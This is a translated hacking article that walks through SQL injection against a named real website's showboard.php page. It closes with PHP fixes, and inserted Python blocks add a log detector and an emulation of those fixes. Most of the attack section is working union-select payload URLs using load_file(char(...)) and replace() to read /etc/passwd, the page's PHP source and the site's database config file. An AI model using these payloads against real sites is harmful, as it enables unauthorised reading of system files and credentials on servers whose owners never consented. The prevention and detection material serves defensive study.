Author: cnbird
Source: http://www.juntuan.net/

Thanks to the Corps for giving me such a good environment and letting me write some original articles.

Cause: a friend who had promised to put out CASI 2.0 also promised me an address with a vulnerability. I had not tested it, and I had been quite depressed lately and unable to study, so I decided to have some fun and see whether the PHP I had learned was enough for this.

Process: the address I was given is http://www.gametea.com/showboard.php?id=282, a standard PHP injection form, so we inject according to the standard PHP injection method. First append a single quote:

    http://www.gametea.com/showboard.php?id=282'

As Figure 1 shows, the error tells us two things: first, magic_quotes_gpc = Off; second, the web path is /home/newgt/showboard.php. Before submitting statements, let me first explain the principle of PHP injection with a small example. PHP injection exploits insufficient filtering of variables. Look at the following two SQL statements:
    1. select * from article where articleid='$id'
    2. select * from article where articleid=$id

Both forms are common in all kinds of programs, but their security is different. In the first, the variable sits inside single quotes, so whatever we submit becomes a string; even if it contains a correct SQL statement, it will not execute. The second is different: because the variable is not quoted, anything we submit that contains a space has the part after the space executed as SQL. Let us submit a successful malformed statement for each of the two and compare.

    1. Set $id to: 1' and 1=2 union select * from user where userid=1/*
       The whole SQL statement becomes:
       select * from article where articleid='1' and 1=2 union select * from user where userid=1/*'

    2. Set $id to: 1 and 1=2 union select * from user where userid=1
       The whole SQL statement becomes:
       select * from article where articleid=1 and 1=2 union select * from user where userid=1

See the difference? Because the first statement has single quotes, we must first close the preceding quote so that what follows is executed as SQL, and then comment out the trailing quote at the end of the statement; only then does the injection succeed. If magic_quotes_gpc is set to On in php.ini, or the variable goes through the addslashes() function, our attack fails. The second statement does not wrap the variable in quotes, so we need not think about closing or commenting at all: direct submission works.

Now we submit a statement following Angel's method:

    http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,7,6,5,4,3,2,1

From the result we learn that the two positions holding 7 and 9 are displayed as text, so that is where the content of the file we want will appear. Now let us read files on the server. Judging from the web path, the machine should be UNIX, so our goal is the file /etc/passwd. We know that a SQL statement can use all sorts of MySQL built-in functions. The commonly used ones are database(), user(), system_user(), session_user() and current_user(), which return some system information, and a more useful one is load_file(), which reads a file and returns its content as a string. Seeing this, you should already think of what we can do: read some confidential files. But there are some restrictions:
To read a file you must give its full path on the server, the MySQL user must have permission to read it, the file must be readable, and it must be smaller than max_allowed_packet. If the file does not exist, or cannot be read for any of the reasons above, the function returns NULL (empty). The hardest one is permission: under Windows, if NTFS permissions are set properly, you cannot read the relevant file, and when you run into a file that only Administrators can access, you have to give up. In practical injection, we have two difficulties to solve:
1. The absolute physical path.
2. Constructing an effective malformed statement.

In many PHP programs, submitting a wrong query while display_errors = On makes the program expose the absolute path of the web directory. Once that path is known, for an injectable PHP program, the security of the entire server is seriously threatened. Constructing the statement is the smaller problem. We use load_file(char()); for this we need to convert /etc/passwd into numeric character codes, and the ASC2chr tool can help us with that conversion. With the codes for /etc/passwd, the statement we build is:

    http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1

That easily gets us the /etc/passwd file; take a look at the picture, as shown in Figure 4.
Now we look for a way to read the config file. Because we already obtained the web path earlier, building the statement is easy; first we read showboard.php itself:

    http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),6,5,4,3,2,1

as shown in Figure 5.
However, the result is not what we expected: we did not get the PHP source code. It turns out the PHP code is processed by the server. At this point we could use Angel's way and use into outfile to back up the file on the server and then read it, but I did not do that, because I did not want to be limited to someone else's approach; I believed MySQL must have a powerful function that could help us. I remembered that when I was learning the string functions I learned one called replace(), whose job is to replace a specified string with the string we want, and I thought it could be used. The replace() function is documented as:

    REPLACE(str, from_str, to_str)
    Returns the string str with all occurrences of the string from_str replaced by the string to_str.
    mysql> SELECT REPLACE('www.mysql.com', 'w', 'ww');
        -> 'wwwwww.mysql.com'

Here I thought: PHP source code has a fixed form, <?php ... ?>. So if we break that form by turning the < of <?php ... ?> into another character, the code should be displayed. Following this idea, I built:

    http://www.gametea.com/showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1

char(60) is <, and char(32) is a space, so this replaces < with a space. We succeeded; everyone can see the result in Figure 6. Our goal is to read the config file. His config file is /home/newgt/localdata.php, so the statement is:

    http://www.gametea.com/showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1

With that we have obtained the converted config file, as shown in Figure 7.
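As an added example that is not part of the original article, here is a small Python check a site operator could run over web-server access logs to spot the request pattern walked through above (union select feeding load_file(char(...))) and to decode the CHAR() argument back into the file path that was asked for. The log lines, client address and timestamps are constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample access-log lines (not real server data), replaying the
# kind of requests the article walks through against a showboard.php-style page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2005:12:00:01 +0000] "GET /showboard.php?id=282 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2005:12:00:02 +0000] "GET /showboard.php?id=282' HTTP/1.1" 200 312
203.0.113.5 - - [10/Oct/2005:12:00:03 +0000] "GET /showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1 HTTP/1.1" 200 2048
203.0.113.5 - - [10/Oct/2005:12:00:04 +0000] "GET /showboard.php?id=282%20and%201=2%20union%20select%2050,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1 HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) ')          # request target of the log line
CHAR_RE = re.compile(r'char\s*\(\s*([0-9\s,]+)\)', re.I)   # MySQL CHAR(n,n,...) calls
UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.I | re.S)

def decode_char_calls(query: str) -> list:
    """Rebuild the string each CHAR(n,n,...) call produces, e.g. the path handed to load_file()."""
    decoded = []
    for m in CHAR_RE.finditer(query):
        codes = [int(c) for c in m.group(1).split(',') if c.strip()]
        decoded.append(''.join(chr(c) for c in codes if c < 0x110000))
    return decoded

def inspect_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if nothing suspicious is in the query string."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = unquote(unquote(m.group(1)))        # decode twice to catch double encoding
    path, _, query = target.partition('?')
    findings = []
    if UNION_RE.search(query):
        findings.append('union-select')
    if 'load_file' in query.lower():
        findings.append('load_file')
    if "'" in query:
        findings.append('quote')
    if not findings:
        return None
    # Only multi-character CHAR() strings are interesting: those are file paths, not single bytes.
    paths = [s for s in decode_char_calls(query) if len(s) > 1]
    return {'path': path, 'findings': findings, 'decoded': paths}

def scan(log: str) -> list:
    """Run inspect_line() over every line and keep the hits."""
    return [hit for hit in (inspect_line(l) for l in log.splitlines()) if hit]
```

The decoded paths show what an injected load_file() call actually targeted, which is the first thing to check when triaging such a hit.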
By now our line of thinking should be clear, and I will not go further. If you are interested, you can refer to my previous article and continue the penetration. Here we clearly see how a small injection vulnerability becomes such a big hole, and I hope people in China will pay attention to it. Prevention has two sides: the server and the code itself. The server configuration has been covered in many articles, and amounts to nothing more than setting magic_quotes_gpc to On and display_errors to Off, so there is not much to add. Since this article is about a problem in the program, we look for the cause in the program itself. That PHP is easy to use and safe shows in its built-in functions. For an integer variable, a single intval() call solves the problem: before running the query, we process the variable first, like this:

    $id = intval($id);
    mysql_query("SELECT * FROM article WHERE articleid='$id'");

or written as:
    mysql_query("SELECT * FROM article WHERE articleid=".intval($id));

However it is constructed, the value is converted to an integer before it goes into the database. Many large programs are written this way; it is very simple. For string variables, the built-in function addslashes() can be used. Like magic_quotes_gpc, after it is applied every ' (single quote), " (double quote), \ (backslash) and NUL character is automatically turned into an escaped character with a backslash in front of it. Even if magic_quotes_gpc is on, using addslashes() causes no conflict, so you can use it freely. Examples are as follows:
    $username = addslashes($username);
    mysql_query("SELECT * FROM member WHERE userid='$username'");

or written as:
    mysql_query("SELECT * FROM member WHERE userid='".addslashes($username)."'");

Using the addslashes() function avoids errors caused by quote marks. The fix for the search engine in my previous article is to convert "_" and "%" directly into "\_" and "\%", and of course do not forget to use the addslashes() function as well. The specific code is as follows:
    $keywords = addslashes($keywords);
    $keywords = str_replace("_", "\_", $keywords);
    $keywords = str_replace("%", "\%", $keywords);

OK, this article ends here.

References:
SQL Injection with MySQL: http://www.4ngel.net/Article/36.htm
Advanced SQL Injection with MySQL: http://www.4ngel.net/Article/30.htm
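As an added example that is not the article's own code, the following Python emulates PHP's intval() and addslashes() to show exactly what SQL each of the fixes above produces when fed the article's own payloads, and also covers the caveat that addslashes() only helps when the value is wrapped in quotes (the unquoted form from the "two statements" section stays open). The member table and helper names are assumptions for the illustration.

```python
import re

def php_intval(value: str) -> int:
    """Leading-integer parse like PHP intval(): '282 and 1=2' -> 282, 'abc' -> 0."""
    m = re.match(r'\s*([+-]?\d+)', value)
    return int(m.group(1)) if m else 0

def php_addslashes(value: str) -> str:
    """Prefix ' " \\ and NUL with a backslash, the way PHP addslashes() does."""
    return (value.replace('\\', '\\\\').replace("'", "\\'")
                 .replace('"', '\\"').replace('\x00', '\\0'))

def article_query(raw_id: str) -> str:
    """The article's integer fix: intval() before the value reaches the query."""
    return f"SELECT * FROM article WHERE articleid={php_intval(raw_id)}"

def member_query(username: str) -> str:
    """The article's string fix: addslashes() on a value that is wrapped in quotes."""
    return f"SELECT * FROM member WHERE userid='{php_addslashes(username)}'"

def member_query_unquoted(username: str) -> str:
    """Caveat (assumed anti-pattern for illustration): addslashes() with no quotes around the value."""
    return f"SELECT * FROM member WHERE userid={php_addslashes(username)}"

def like_keyword(keywords: str) -> str:
    """The search-engine fix: addslashes() plus escaping of the LIKE wildcards _ and %."""
    k = php_addslashes(keywords)
    return k.replace('_', '\\_').replace('%', '\\%')
```

The unquoted variant still carries the injected union select through untouched, which is why the quoted form is the one to use with addslashes().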